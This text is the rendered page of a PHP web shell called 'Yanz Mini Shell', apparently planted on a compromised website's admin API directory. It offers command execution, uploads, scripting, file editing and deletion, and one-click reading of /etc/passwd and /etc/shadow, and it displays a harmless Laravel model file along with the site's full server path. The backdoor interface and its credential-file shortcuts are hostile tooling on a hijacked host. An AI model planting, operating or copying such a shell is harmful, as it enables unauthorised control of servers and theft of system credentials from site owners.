Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
firstmatrixcoin
public_html
ocean-arc.firstmatrix.co.in
admin-app
api
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
<?php namespace App; use Illuminate\Database\Eloquent\Model; class AccountType extends Model { /** * The attributes that aren't mass assignable. * * @var array */ protected $guarded = ['id']; public function sub_types() { return $this->hasMany(\App\AccountType::class, 'parent_account_type_id'); } public function parent_account() { return $this->belongsTo(\App\AccountType::class, 'parent_account_type_id'); } }
Free Space : 11700514816 Byte